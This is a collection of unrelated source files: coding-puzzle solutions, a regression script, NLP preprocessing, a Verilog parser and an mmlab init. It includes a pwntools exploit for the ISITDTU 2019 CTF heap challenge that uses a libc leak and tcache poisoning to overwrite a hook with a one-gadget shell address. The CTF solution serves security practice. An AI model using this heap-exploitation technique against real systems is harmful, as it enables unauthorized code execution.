"[email protected]"
] | |
919c233e7bdb36d3f70e3650491f482e24733d42
|
5b4835aeda881f6784d7836801056d001023eff5
|
/2021/day-02/part2.py
|
14315142011e6bbbfd62dd9dbd63d1b0072ec4fc
|
[] |
no_license
|
xNaCly/advent-of-code
|
852cc53aef15b96aa537170e14cfa41bbf4078c5
|
3e02706bcd37bc2250e9580aa6418fc696e68338
|
refs/heads/master
| 2023-06-11T06:22:01.662727 | 2023-05-31T05:56:46 | 2023-05-31T05:56:46 | 317,822,846 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 321 |
py
|
# Advent of Code 2021, day 2 (part 2): steer the submarine using an "aim" value.
# "forward N" moves horizontally and dives by aim*N; "down"/"up" adjust the aim.
input_path = "i.txt"
with open(input_path, "r") as handle:
    commands = [line.strip() for line in handle]
horizontal = 0
depth = 0
aim = 0
for command in commands:
    direction, amount = command.split(" ")
    steps = int(amount)
    # Only the first letter distinguishes forward/down/up.
    first_letter = direction[0]
    if first_letter == "f":
        horizontal += steps
        depth += aim * steps
    elif first_letter == "d":
        aim += steps
    elif first_letter == "u":
        aim -= steps
print(horizontal * depth)
|
[
"[email protected]"
] | |
490ef3f5be6348257d27d3d533195e69d91777d2
|
ebec5b460e0e5c901bd9bd155d341421be892a00
|
/linear_regression.py
|
431d39a487631ff0394013c562dd52577f1d3e7a
|
[] |
no_license
|
fredster9/thinkful-data-course
|
d0c9d746c4948da0ee8e936f20c3c9ef3c3fe11e
|
8aa4e9eaf4eecd04a8477284ce1e273dea344a5a
|
refs/heads/master
| 2021-01-22T22:21:21.439948 | 2015-06-06T19:38:15 | 2015-06-06T19:38:15 | 32,560,107 | 0 | 0 | null | 2015-04-14T03:10:13 | 2015-03-20T03:22:45 |
Python
|
UTF-8
|
Python
| false | false | 2,087 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Fri Mar 27 20:36:39 2015
@author: fred
"""
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
import statsmodels.api as sm
# NOTE(review): Python 2 script (print statements); pd.scatter_matrix was
# removed in later pandas — runs only on the legacy stack it was written for.
# Load the Lending Club loans sample straight from the course S3 bucket.
ld = pd.read_csv('https://spark-public.s3.amazonaws.com/dataanalysis/loansData.csv')
## Strip % signs from Interest.Rate
ld['Interest.Rate'] = ld['Interest.Rate'].map(lambda x: x.strip('%'))
ld['Interest.Rate'] = ld['Interest.Rate'].astype(float)
## Remove 'months' from Loan Length and convert to integer - from tutorial
cleanLoanLength = ld['Loan.Length'].map(lambda x: int(x.rstrip(' months')))
ld['Loan.Length'] = cleanLoanLength
## Process FICO score range to get low end into new col
# Add new column
ld['FICO.Score'] = pd.Series('', index=ld.index)
# Convert FICO.Range from object to str
print type(ld['FICO.Range'])
ld['FICO.Range'] = ld['FICO.Range'].map(lambda x: x.split('-'))
ld['FICO.Range'] = ld['FICO.Range'].astype(str)
# NOTE(review): slices chars 2..4 of the stringified list (e.g. "['720', '724']"
# -> "720"); works only while the low end has exactly three digits — fragile.
ld['FICO.Score'] = ld['FICO.Range'].map(lambda x: int(x[2:5]))
plt.figure()
graph = ld['FICO.Score'].hist()
plt.show()
a = pd.scatter_matrix(ld, alpha = 0.5, figsize=(10,10), diagonal="hist")
## Doing the linear regression
intrate = ld['Interest.Rate']
loanamt = ld['Amount.Requested']
fico = ld['FICO.Score']
# Reshape column data returned as series
# The dependent variable
y = np.matrix(intrate).transpose()
# The independent variable reshaped as columns
x1 = np.matrix(fico).transpose()
x2 = np.matrix(loanamt).transpose()
# Put columns together to create input matrix w/ one col for each independent variable
x = np.column_stack([x1,x2])
# Create linear model
X = sm.add_constant(x) # add_constants appends col of ones to array if prepend == False
model = sm.OLS(y,X) # OLS = ordinary least squares model
f = model.fit() # fit the model
print 'F PARAMS', f.params[:] # prints everything
# Output the results
print 'Coefficients: ', f.params[1:3]
print 'Intercept: ', f.params[0]
print 'P-Values: ', f.pvalues
print 'R-Squared: ', f.rsquared
# Pairwise correlations across all numeric columns, for reference.
corr_table = ld.corr()
print corr_table
# Persist the cleaned dataset for the next stage of the course work.
ld.to_csv('loansData_clean.csv', header=True, index=False)
|
[
"[email protected]"
] | |
ed6dc456eab11ab5052cb302c87cfbb2ebce405a
|
e53009b7543a6dff5019dd8f21c9e7488d9daf72
|
/2019/ISITDTU Quals/iz_heap.py
|
3ec97d74aafa5b1c64c985d868e9f9bc378e27a5
|
[] |
no_license
|
hOwD4yS/CTF
|
ca8546cd0715ce4a3c2ebe5bf3939cc19932d38f
|
0ff3de58513cbeb602a475f6add97b51c5574e28
|
refs/heads/master
| 2021-06-06T18:14:00.884142 | 2021-05-06T08:33:00 | 2021-05-06T08:33:00 | 144,465,413 | 9 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,144 |
py
|
# Python 2 pwntools exploit for ISITDTU Quals 2019 "iz_heap_lv1".
# Strategy (as visible below): fill the 0x90 tcache bin, unsorted-bin leak of a
# libc pointer via the name buffer, then a tcache-poisoning write to get a
# one-gadget shell. Offsets (0x3ebca0, 0x3ed8e8, 0x4f322) are libc-specific.
from pwn import *
#p = process("./iz_heap_lv1")
p = remote("165.22.110.249",3333)
def add(size , data):
    # Menu option 1: allocate a chunk of `size` bytes and write `data` into it.
    p.sendlineafter(":","1")
    p.sendlineafter(":",str(size))
    p.sendafter(":",data)
def edit(idx , size , data):
    # Menu option 2: resize/rewrite the chunk at index `idx`.
    p.sendlineafter(":","2")
    p.sendlineafter(":",str(idx))
    p.sendlineafter(":",str(size))
    p.sendafter(":",data)
def delete(idx):
    # Menu option 3: free the chunk at index `idx`.
    p.sendlineafter(":","3")
    p.sendlineafter(":",str(idx))
def editname(name):
    # Menu option 4: overwrite the saved name buffer (the write primitive).
    p.sendlineafter(":","4")
    p.sendlineafter(":","Y")
    p.sendafter(":",name)
# Presumably answers the program's initial name prompt with a fake 0x91 chunk
# whose address (0x602120) lands in the pointer table — confirm against binary.
p.sendafter(":",p64(0x0000000000602120)+p64(0)+p64(0)+p64(0x91)+"A"*0x80+p64(0)+p64(0x21)+"A"*0x10+p64(0)+p64(0x21))
# Fill the 0x80-size tcache bin (7 entries) so the next free goes unsorted.
for i in range(7):
    print i
    add(0x7f,"A")
for i in range(7):
    print i
    delete(i)
# Free the fake chunk at index 20: it lands in the unsorted bin, leaving
# libc main_arena pointers inside the name buffer.
delete(20)
editname("A"*0x20)
# Leak the arena pointer and compute the libc base (0x3ebca0 = leak offset).
libcbase = u64(p.recvuntil("\x7f")[-6:]+"\x00\x00") - 0x3ebca0
print hex(libcbase)
# Rebuild the fake chunk as size 0x71 and free it into the 0x70 tcache bin.
editname(p64(0x0000000000602120)+p64(0)+p64(0)+p64(0x71)+"A"*0x60+p64(0)+p64(0x21)+"A"*0x10+p64(0)+p64(0x21))
delete(20)
# Poison the tcache fd with libc+0x3ed8e8 (__free_hook vicinity) so the second
# 0x68 allocation returns that address; write a one-gadget (libc+0x4f322) there.
editname(p64(0x0000000000602120)+p64(0)+p64(0)+p64(0x71)+p64(libcbase+0x3ed8e8)+"A"*(0x60-8)+p64(0)+p64(0x21)+"A"*0x10+p64(0)+p64(0x21))
add(0x68,"A")
add(0x68,p64(libcbase+0x4f322))
p.interactive()
|
[
"[email protected]"
] | |
5c4708a3dc80cafe963aa64187ed32d51dfc890f
|
40f9febe33ab1b2aaf8e7b9a965dc4966476ab52
|
/models/vision/detection/awsdet/utils/runner/hooks/logger/__init__.py
|
2ace40536b0692bc9f7c12b192f427ae1b06c7ac
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT"
] |
permissive
|
johnbensnyder/deep-learning-models
|
770a9257eadb8f1b5bc250f277a45ac8c0eba2e7
|
5b1194a862c026a30d5dfff46979cb7e80869e81
|
refs/heads/master
| 2022-11-28T11:51:20.326742 | 2020-08-07T22:36:46 | 2020-08-07T22:36:46 | 262,207,411 | 0 | 1 |
Apache-2.0
| 2020-05-08T02:26:16 | 2020-05-08T02:26:16 | null |
UTF-8
|
Python
| false | false | 233 |
py
|
# Copyright (c) Open-MMLab. All rights reserved.
from .base import LoggerHook
from .text import TextLoggerHook
from .tensorboard import TensorboardLoggerHook
# Public names re-exported by this logger-hooks package.
__all__ = [
    'LoggerHook', 'TextLoggerHook', 'TensorboardLoggerHook'
]
|
[
"[email protected]"
] | |
6b7c195eb0414b4a3705b64a56edf4b9fe4a9c26
|
615bdda10d9473c1c76fbfc28ed6cb378fa4a741
|
/techgig_solutions/30_days_challenge/day_28.py
|
56c2e9288b27671cfede645a60adc1e887b10f72
|
[] |
no_license
|
Soluspero/coding_practice
|
08de2796ec2cec1c96185e7affe567b3bc90c935
|
175ce97530404724dd040cd7d0ce15a368a3ffa1
|
refs/heads/master
| 2020-04-19T16:27:23.250675 | 2019-05-22T02:03:04 | 2019-05-22T02:03:04 | 168,305,153 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,099 |
py
|
'''
Compare two numbers (100 Marks)
For this challenge, you will take two integers input from stdin, sum the digits of a number and same is to be done with another number. Then compare the sum of the digits of two numbers and if one sum found to be greater then print that number to the stdout. If found both sum to be equal then print 'Equal' to the stdout.
Input Format
Two integer values to be taken as input from stdin.
Constraints
1 < (a,b) < 10^9
Output Format
Print the single number after comparison. If found equal, then print 'Equal' to the stdout.
Sample TestCase 1
Input
345678 444444
Output
345678
'''
''' Read input from STDIN. Print your output to STDOUT '''
#Use input() to read input from STDIN and use print to write your output to STDOUT
from sys import stdout
def plus(n):
    """Return the sum of the decimal digits of n (n expected positive)."""
    total = 0
    while n != 0:
        # divmod peels off the last digit and the remaining prefix in one step.
        n, digit = divmod(n, 10)
        total += digit
    return total
def main():
    """Read two integers from stdin; print the one with the larger digit sum,
    or 'Equal' if the sums match."""
    # Write code here
    a,b = input().strip().split()
    a,b = int(a),int(b)
    a1 = plus(a)
    b1 = plus(b)
    if a1 > b1:
        stdout.write(str(a))
    elif b1 > a1:
        stdout.write(str(b))
    else:
        stdout.write("Equal")
main()
|
[
"[email protected]"
] | |
a9db9d36ada768fb305ce1f861cf4a50ac70729a
|
fe8142632f381654a0b7073664c534dfbebb7851
|
/ADJUSTABLE2.py
|
282adb18887b73f074490de0080b3602609799f9
|
[] |
no_license
|
edgelore/Testing_development_over_time_for_creation_of_a_language
|
2b4f248fbfed3c20207ff8ae11596073fd216066
|
1ad3ccbd37cc5831ecf1c7a55776592c4cae03f9
|
refs/heads/master
| 2020-04-13T22:28:07.528334 | 2018-12-29T06:02:11 | 2018-12-29T06:02:11 | 163,480,021 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 41 |
py
|
# Module-level constant; the module exists solely to define this string
# (part of the repo's language-creation experiments).
ADJUSTABLE2 = "CAPABILITY TO ADJUST"
|
[
"[email protected]"
] | |
e8493a1b631c82cd20a805041411a0ddabce63d0
|
5e5b8a66d35be6b86d3754069613fe49108a700d
|
/scripts/webquestions-preprocessing/paraphrase_rules.py
|
b8ff50290c2c4c922205a06b3aa5feddffdd7d10
|
[
"CC-BY-4.0"
] |
permissive
|
saraswat/graph-parser
|
e77f9880f38d1d23cf5aebb149be997d9c715745
|
da8800503174dce0590a55b817cd024354e41d9e
|
refs/heads/master
| 2021-01-11T09:01:50.414615 | 2016-12-23T13:17:59 | 2016-12-23T13:17:59 | 77,409,845 | 1 | 0 | null | 2016-12-26T22:26:28 | 2016-12-26T22:26:28 | null |
UTF-8
|
Python
| false | false | 3,122 |
py
|
'''
Created on 26 May 2014
@author: siva
'''
import json
import re
import sys
# Rewrite specific English question patterns in each JSON record read from
# stdin so the downstream parser sees a canonical "profession" question.
# Each line is a JSON object with a "words" list of token dicts
# ({"word", "ner"}) and an "entities" list; the mutated record is echoed
# to stdout.  (Python 2 source: uses the ``print`` statement.)
for line in sys.stdin:
    line = json.loads(line)
    # print line
    # sentence = line['sentence']
    sentence = " ".join([word["word"] for word in line["words"]])
    if re.search(" do \?$", sentence):
        # what did Einstein do?
        # sentence = re.sub(" do\?$", " serve as\?", sentence)
        # Drop trailing "do ?" and ask for the profession instead.
        words = line['words']
        words.pop(-1)
        words.pop(-1)
        word = { "word" : "profession", "ner" : "0"}
        words.append(word)
        word = { "word" : "?", "ner" : "0"}
        words.append(word)
        # Normalize the auxiliary verb to "is".
        for word in words:
            if word['word'] == 'did' or word['word'] == 'do' or word['word'] == 'does':
                word['word'] = 'is'
    if re.search("Where ((is)|(was)) .* from \?$", sentence):
        # where is Obama from ?
        #sentence = re.sub(" from\?$", " born in ?", sentence)
        words = line['words']
        entities = line['entities']
        # Only rewrite when an entity sits immediately before "from ?".
        check = False
        for entity in entities:
            if entity["index"] == len(words) - 3:
                check = True
        if check:
            # Replace trailing "from ?" with "born in ?".
            words.pop(-1)
            words.pop(-1)
            word = { "word" : "born", "ner" : "0"}
            words.append(word)
            word = { "word" : "in", "ner" : "0"}
            words.append(word)
            word = { "word" : "?", "ner" : "0"}
            words.append(word)
    # Disabled rule: strip "name/type/kind of" phrases (kept for reference).
    '''if re.search("((name)|(type)|(kind))", sentence):
    # What is the name of the president of US
    #sentence = re.sub(" the ((name[s]?)|(type[s]?)|(kind[s]?)) of", "", sentence)
    #sentence = re.sub(" ((name[s]?)|(type[s]?)|(kind[s]?)) of", "", sentence)
    #sentence = re.sub(" ((name[s]?)|(type[s]?)|(kind[s]?))", "", sentence)
    words = line['words']
    entities = line['entities']
    for i, word in enumerate(words):
        if re.match("((name)|(kind)|(type))", word['word']):
            if len(words) > i + 1 and words[i + 1]["word"] == "of":
                words.pop(i)
                words.pop(i)
                for entity in entities:
                    if entity["index"] > i:
                        entity["index"] += -2
            else:
                words.pop(i)
                if words[i - 1]["word"] == "the" or words[i - 1]["word"] == "a":
                    words.pop(i - 1)
                    for entity in entities:
                        if entity["index"] > i - 1:
                            entity["index"] += -1
            break'''
    # Re-join after the edits above, then canonicalize "What/Who is X ?"
    # into "What is X 's profession ?".
    sentence_mod = " ".join([word["word"] for word in line["words"]])
    # print sentence_mod
    if re.match("((What)|(Who)) ((is)|(was)) [^\s]+ \?", sentence_mod):
        words = line["words"]
        words[0] = {"word" : "What", "ner" : "0"}
        words[1] = {"word" : "is", "ner" : "0"}
        words[3] = {"word" : "'s", "ner" : "0"}
        words.append({"word" : "profession", "ner" : "0"})
        words.append({"word" : "?", "ner" : "0"})
    print json.dumps(line)
|
[
"[email protected]"
] | |
e0f9e0cc67afaf29f291926c9c6aa95c05deb166
|
5792baf9e18ad91816cc42f4725b099a4dce7b7b
|
/HackerRank/Strings/Python sWap cASE.py
|
9e524564145bac64f1ed70970b832d5b588f495a
|
[] |
no_license
|
deepakorantak/Python
|
83b6782db0b5428d47fbc29193076e8ed5f5e285
|
9781133ce5a5c6f87efb5d4aa132a63ba1290f76
|
refs/heads/master
| 2020-03-23T19:55:30.075700 | 2019-02-19T06:24:42 | 2019-02-19T06:24:42 | 142,010,440 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 178 |
py
|
def swap_case(s):
    """Return *s* with the case of every cased character inverted."""
    return s.swapcase()
if __name__ == '__main__':
    s = input()
    # HackerRank constraint: 0 < len(s) <= 1000; other input is silently ignored.
    if len(s) > 0 and len(s) <= 1000:
        result = swap_case(s)
        print(result)
|
[
"[email protected]"
] | |
6ea5d6604909fba4dae2f6fa379bf3062b294799
|
f78d8aae7c2e3c5c705b445d252822dffa5d2141
|
/app/parse.py
|
0399dbeed21272ffe777ee82458b17cb5c44a121
|
[
"MIT"
] |
permissive
|
o-alexandre-felipe/verilog-structural-manipulation
|
bc832ec2e061121ceb82b3441bd410806c785cc5
|
d210b415cfa2ef732ba1099c8934b4b4354f2526
|
refs/heads/master
| 2021-09-08T03:57:14.697822 | 2021-09-03T08:22:07 | 2021-09-03T08:22:07 | 95,001,077 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 20,841 |
py
|
import re;
module_re = re.compile('\\bmodule\\b.*?\\bendmodule\\b', re.MULTILINE | re.DOTALL);
module_parts_re = re.compile("""
\\bmodule\\b\s*
([a-zA-Z_][a-zA-Z0-9_]*) # module name
\s*(\#\s*\(.*?\))? # parameters are serparated by commas,
# the port list is separated with spaces
\s*\((.*?)\)\s*; # module port list
(.*?) # module body
\\bendmodule\\b
""", re.MULTILINE | re.DOTALL | re.VERBOSE)
comments = re.compile('//.*?$|/\*.*?\*', re.MULTILINE | re.DOTALL | re.VERBOSE)
instance_re = re.compile("""
(\\b[a-zA-Z_][a-zA-Z0-9_]*\\b) # module name
\s*(\#\s*\(.*?\))? # parameter list this works only because of the ';' separating each instance
\s*?(\\b[a-zA-Z_][a-zA-Z0-9_]*\\b) # instance name
\s*?[(](.*?)[)]\s*; # port connections""", re.MULTILINE | re.DOTALL | re.VERBOSE)
""" Capture signal declarations
<s> name;
s [.:.] name;
"""
signal_re = lambda s, sep = ';': re.compile("""
((\\b%s\\b)\s*(\\[.*?:.*?\\])?\s*?(\\b[_a-zA-Z].*?\\b)\s*)%s
""" % (s, sep), re.MULTILINE | re.DOTALL | re.VERBOSE);
""" Capture different forms of parameter
parameter name = <>
parameter <type> name = <>
parameter <type> [range] name = <>
type is restricted to lowercase words. """
parameter_re = re.compile("""
parameter
\\b\s*?(?:[a-z]*?) # type
(?:\s*\[.*?\])?\s*? # range
(\\b[_A-Za-z].*?\\b)\s* # name
\\=\s*([^,;]*) # value
""", re.MULTILINE | re.DOTALL | re.VERBOSE)
v95 = False;
input_re = signal_re('input\\b\\s*(?:\\bwire\\b)?', '[;,]');
output_re = signal_re('output\\b\\s*(?:\\bwire\\b)?','[;,]');
inout_re = signal_re('inout\\b\\s*(?:\\bwire\\b)?', '[;,]');
wire_re = signal_re('wire\\b');
named_connection_re = re.compile("\s*[.](\\b[a-zA-Z_][a-zA-Z0-9_]*\\b)\s*\\((.*?)\\)\s*",
re.MULTILINE | re.DOTALL | re.VERBOSE);
name_re = re.compile("\\b(?<!')([_a-zA-Z][a-zA-Z0-9_]*?|\\\\.*?\s)\\b");
class signal_declaration:
    """One Verilog signal (port or wire).

    Holds the raw source text (when parsed from a file), the storage
    class keyword, an optional "[msb:lsb]" range, and the signal name.
    """

    def __init__(self, src, _class, _range, _name):
        # *src* is the verbatim declaration text when the signal came from
        # a parsed file; synthesized declarations carry src == None and are
        # rendered from the individual fields instead.
        self.src = src
        self._class = _class.strip()
        self._range = _range.strip()
        self.name = _name.strip()

    def __str__(self):
        if self.src is None:
            return self._class + ' ' + self._range + ' ' + self.name
        return self.src

    def astype(self, _class):
        """Copy of this signal with a different storage class (e.g. 'wire')."""
        return signal_declaration(None, _class, self._range, self.name)

    def renamed(self, new_name):
        """Copy of this signal under a new name."""
        return signal_declaration(None, self._class, self._range, new_name)

    def translate_parameters(self, param_translation):
        """Given a dictionary with parameters update the range
        if any parameter is found."""
        def substitute(match):
            token = match.group(1)
            # Leave identifiers that are not parameters untouched.
            return param_translation.get(token, token)

        if self.src is None:
            self._range = name_re.sub(substitute, self._range)
        else:
            self.src = name_re.sub(substitute, self.src)
class module_declaration:
    """Parsed representation of one Verilog module.

    Captures the module name, port list, signal dictionaries (inputs,
    outputs, inouts, wires), parameters, and -- after ``link`` -- the
    instantiated sub-blocks.  (Python 2 source: uses ``print`` statements
    and string exceptions.)
    """
    def __init__(self, s, src_file = None):
        r = module_parts_re.match(s);
        self.src = s;
        self.src_file = src_file;
        # body_changed == False means __str__ can echo the original text.
        self.body_changed = False;
        self.num_instances = 0;
        if(r == None):
            # NOTE(review): raising a plain string is a Python-2-only idiom
            # (removed in 2.6+); this would raise TypeError on modern
            # interpreters -- confirm intent.
            raise "Invalid string for a module definition";
        else:
            self.num_insts = 0;
            self.name = r.group(1);
            self.ports_string = r.group(3);
            self.ports = [p.strip() for p in r.group(3).split(',')];
            self.body_src = r.group(4);
            self.find_inputs();
            self.find_outputs();
            self.find_wires();
            self.find_inouts();
            self.instances = {};
            self.sub_blocks = {};
            self.parameters = {};
            # Body parameters first, then "#( ... )" header parameters.
            for p in parameter_re.findall(self.body_src):
                self.parameters[p[-2]] = p[-1].strip();
            if(r.group(2) != None):
                sp = r.group(2);
                # Keep only the text between the outermost parentheses.
                sp = sp[sp.index('('):len(sp) - sp[::-1].index(')') - 1];
                for p in parameter_re.findall(sp):
                    self.parameters[p[-2]] = p[-1].strip();
    def get_signal(self, name):
        """ Return a signal by it's name regardless of its type. """
        if(name in self.outputs):
            return self.outputs[name];
        if(name in self.inputs):
            return self.inputs[name];
        if(name in self.wires):
            return self.wires[name];
        if(name in self.inouts):
            # NOTE(review): missing ``return`` -- an inout lookup evaluates
            # the value and falls through, so the method yields None for
            # inouts; confirm whether that is intended.
            self.inouts[name];
    def get_signal_direction(self, signal):
        """ Determine the type of a signal,
        based on the dictionary it is present. """
        if(signal in self.outputs):
            return 'output';
        elif(signal in self.inputs):
            return 'input';
        elif(signal in self.wires):
            return 'wire';
        elif(signal in self.inouts):
            return 'inout';
        else:
            return None;
    def find_wires(self):
        """ Using a regular expression find wires and store them
        in a dictionary wires """
        self.wires = {};
        # Scan both the body and the port list (trailing ',' closes the
        # last port so the regex terminator matches).
        for w in wire_re.findall(self.body_src) + wire_re.findall(self.ports_string + ','):
            self.wires[w[3]] = signal_declaration(*w);
    def find_inputs(self):
        """ Using a regular expression find inputs and store them
        in a dictionary inputs """
        self.inputs = {};
        for w in input_re.findall(self.body_src) + input_re.findall(self.ports_string + ','):
            self.inputs[w[3]] = signal_declaration(*w);
    def find_outputs(self):
        """ Using a regular expression find outputs and store them
        in a dictionary outputs """
        self.outputs = {};
        for w in output_re.findall(self.body_src) + output_re.findall(self.ports_string + ','):
            self.outputs[w[3]] = signal_declaration(*w);
    def find_inouts(self):
        """ Using a regular expression find inouts and store them
        in a dictionary inouts """
        self.inouts = {};
        for w in inout_re.findall(self.body_src) + inout_re.findall(self.ports_string + ','):
            self.inouts[w[3]] = signal_declaration(*w);
    def __str__(self):
        # Regenerate the text only when the module was edited; otherwise
        # echo the original source verbatim.
        if(self.body_changed):
            sm = "module " + self.name;
            sm += self.parameter_declaration_v2001();
            sm += '\n(\n' + self.port_list_string() + '\n);\n '
            sm += self.parameter_declaration_v95();
            sm += self.signal_declarations_string();
            sm += ''.join(['\n ' + str(e).strip() + ';' for e in self.instances.values()])
            sm += '\n\nendmodule\n\n'
            return sm;
        else:
            return self.src + '\n';
    def link(self, dict):
        """ This routine find instances in the module body
        and replace when possible with an object representing
        that instance, based on the available modules, passed
        via dict argument.
        """
        insts = instance_re.findall(self.body_src);
        for i in insts:
            s = i[0] + ' ' + i[1] + ' ' + i[2] + '(' + i[3] + ')';
            if(i[0] in dict):
                # Resolved: remember it both as an instance and a sub-block.
                b = instance_declaration(src = s, ref = dict[i[0]], parent = self, name = i[2]);
                self.instances[i[2]] = b;
                self.sub_blocks[i[2]] = b;
            else:
                # Unresolved module: keep the instance with ref == None.
                b = instance_declaration(src = s, ref = None, parent = self, name = i[2]);
                self.instances[i[2]] = b;
    def move_to_chiplet(self, sub_blocks, chiplet_name, chiplet_instname = None):
        """Move the named sub-blocks into a new chiplet module and replace
        them here by a single instance of that chiplet."""
        c = chiplet_declaration(chiplet_name, self);
        if(chiplet_instname == None):
            chiplet_instname = chiplet_name;
        for b in sub_blocks:
            if(b in self.sub_blocks):
                """ Without the variable tmp the RTL is corrupted
                and it takes longer to execute """
                tmp = self.sub_blocks[b];
                c.include_instance(tmp)
                del self.sub_blocks[b];
                del self.instances[b];
            else:
                print "%s not found in %s" % (b, self.name);
        self.sub_blocks[chiplet_name] = c.get_instanciation(parent = self, name = chiplet_instname);
        self.instances[chiplet_name] = self.sub_blocks[chiplet_name];
        self.body_changed = True;
        return c;
    def dissolve_sub_block(self, block_name, prefix = ''):
        """Inline the named sub-block: hoist its wires and instances (with
        *prefix* prepended) into this module, then drop the sub-block."""
        if(block_name in self.sub_blocks):
            new_wires, new_insts = self.sub_blocks[block_name].get_dissolved_content(prefix = prefix);
            # Abort before mutating anything if a name collision exists.
            for w in new_wires:
                if(w in self.wires):
                    raise 'The wire %s already exists, aborted dissolving.' % w;
            for i in new_insts:
                if(i in self.instances):
                    raise 'The instance %s already exists, aborted dissolving.' % i;
            """ Declares the required wires """
            for w in new_wires:
                self.wires[w] = new_wires[w];
            """ Declare the instances from inside the subblock """
            for i in new_insts:
                ii = new_insts[i];
                if(ii.ref != None):
                    self.sub_blocks[i] = ii;
                self.instances[i] = ii;
            """ Remove the sub block from the instances """
            del self.sub_blocks[block_name];
            del self.instances[block_name];
            self.body_changed = True;
        else:
            raise 'sub_block not found, nothing to be dissolved.'
    def hierarchy_tree(self, instname, f = lambda entity, inst_name: [inst_name]):
        """ Create an hierarchical list containing some property
        of each instance, returnded by a function f."""
        r = [f(self, instname), []];
        for sb in self.sub_blocks:
            r[1].append(self.sub_blocks[sb].ref.hierarchy_tree(sb, f))
        return r;
    def parameter_declaration_v2001(self):
        """Render the "#( parameter ... )" header block (Verilog-2001 only)."""
        if(v95):
            return '';
        else:
            if(len(self.parameters) == 0):
                return '';
            else:
                plist = ['parameter %s = %s' % (k,v) for k,v in
                         zip(self.parameters.keys(), self.parameters.values())];
                return "#(\n " + (',\n '.join(plist)) + ')';
    def parameter_declaration_v95(self):
        """Render body-style parameter declarations (Verilog-1995 only)."""
        if(v95):
            # NOTE(review): '...;' (k,v) is missing the ``%`` operator (it
            # would try to *call* the string) and ''.join([plist]) joins a
            # list-of-list; this branch is broken and only runs when the
            # global v95 is True -- confirm before enabling v95.
            plist = ['\n parameter %s = %s;' (k,v) for k,v in
                     zip(self.parameters.keys(), self.parameters.values())];
            return ''.join([plist]);
        else:
            return '';
    def signal_declarations_string(self):
        """ Verilog 1995 defines the types of the ports in the module body
        after verilog 2001 only the wires are declared in the module
        and the ports are fully declared in the port list. """
        sm = '';
        if(v95):
            sm = '\n// Input declarations\n'
            sm += '\n'.join([str(w) + ';' for w in self.inputs.values()])
            sm += '\n// Output declarations\n'
            sm += '\n'.join([str(w) + ';' for w in self.outputs.values()])
            sm += '\n// INOUT declarations\n'
            sm += '\n'.join([str(w) + ';' for w in self.inouts.values()])
        sm += '\n// Wire declarations\n';
        sm += '\n'.join([str(w) + ';' for w in self.wires.values()])
        return sm + '\n\n';
    def port_list_string(self):
        """ The module portlist declares ports that will be present in
        the module, after verilog 2001 it also defines the type of the port """
        sm = '';
        if(v95):
            # NOTE(review): dict.keys() concatenation with ``+`` is a
            # Python-2 idiom (keys() was a list); fails on Python 3.
            sm += ' ' + (',\n '.join(self.inputs.keys() + self.outputs.keys() + self.inouts.keys()));
        else:
            sm += ',\n'.join([str(w) for w in self.inputs.values()] +
                             [str(w) for w in self.outputs.values()] +
                             [str(w) for w in self.inouts.values()]);
        return sm;
    def stub(self):
        """ Write the same HDL struct without the instances
        whose corresponding modules were not declared """
        sm = "module " + self.name + '\n(\n' + ',\n '.join(self.ports) + '\n);\n '
        for p in self.parameters:
            sm += '\n parameter %s = %s;' % (p, self.parameters[p]);
        sm += self.signal_declarations_string();
        sl = [];
        for e in self.sub_blocks.values():
            sl.append(str(e) + ';');
        sm += '\n '.join(sl);
        sm += '\nendmodule\n'
        return sm;
class instance_declaration:
    """One instantiation of a module inside a parent module.

    Wraps the raw instantiation text plus its parsed pieces: parameter
    overrides, instance name, port connection text, and (when resolved)
    a reference to the instantiated module_declaration.
    """
    def __init__(self, src, ref = None, parent = None,
                 name = None, params = None, connections = None):
        # When any piece is missing, re-parse it from the source text.
        if((name == None) or (params == None) or (connections == None) or (ref == None)):
            g = instance_re.match(src + ';');
            if(g != None):
                self.params = g.group(2);
                self.name = g.group(3);
                self.connections = g.group(4);
                self.ref_name = g.group(1);
            else:
                self.src = src;
                self.name = name;
                self.params = params;
                self.connections = connections;
        self.src = src;
        if(ref != None):
            self.ref = ref;
            # Keep a usage count on the referenced module.
            ref.num_instances += 1;
            self.ref_name = self.ref.name;
        else:
            self.ref = None;
        self.parent = parent;
    def __str__(self):
        return self.src;
    def stub(self):
        # Only resolved instances appear in a stub; unresolved ones
        # implicitly return None here.
        if(self.ref != None):
            return self.src;
    def get_port_connections_strings(self):
        """ Retrieve the text that defines each connection """
        if(self.connections == None):
            return [];
        pl = [s for s in named_connection_re.findall(self.connections)];
        return pl;
    def get_parameter_connections_strings(self):
        """Retrieve the (name, value) text of each parameter override."""
        if(self.params == None):
            return [];
        pl = [s for s in named_connection_re.findall(self.params)];
        return pl;
    def get_connections(self):
        """
        return a list of the signals connected to this instance
        with the directions of the port to which it is connected
        - inout is dominant over input and ouput.
        - output is dominant over input.
        This provide the directions to the ports in a module
        that whould encapsulate this instance as is.
        """
        outputs = {};
        inputs = {};
        inouts = {};
        pl = self.get_port_connections_strings();
        """ Create a list of ports from signals connected to the ports """
        for i in range(0, len(pl)):
            """ No support for ordered connections yet """
            names = [s.strip() for s in name_re.findall(pl[i][1])];
            """ Process an named connection """
            direction = self.ref.get_signal_direction(pl[i][0].strip());
            """ Add the signal to the correct bin """
            if(direction == 'output'):
                for n in names:
                    s = self.parent.get_signal(n);
                    if(s != None):
                        outputs[n] = s.astype('output');
            elif(direction == 'input'):
                for n in names:
                    s = self.parent.get_signal(n);
                    if(s != None):
                        inputs[n] = s.astype('input');
            elif(direction == 'inout'):
                for n in names:
                    s = self.parent.get_signal(n);
                    if(s != None):
                        inouts[n] = s.astype('inout');
        """ Remove inputs and outputs that also appears as inout. """
        # NOTE(review): deleting from a dict while iterating it raises
        # RuntimeError on both Python 2 and 3 when a deletion actually
        # occurs -- iterate over a copy of the keys to be safe.
        for p in inputs:
            if ((p in outputs) or (p in inouts)):
                del inputs[p];
        """ Remove inputs that also appear as output. """
        for p in outputs:
            if (p in inouts):
                del outputs[p];
        return inputs, outputs, inouts;
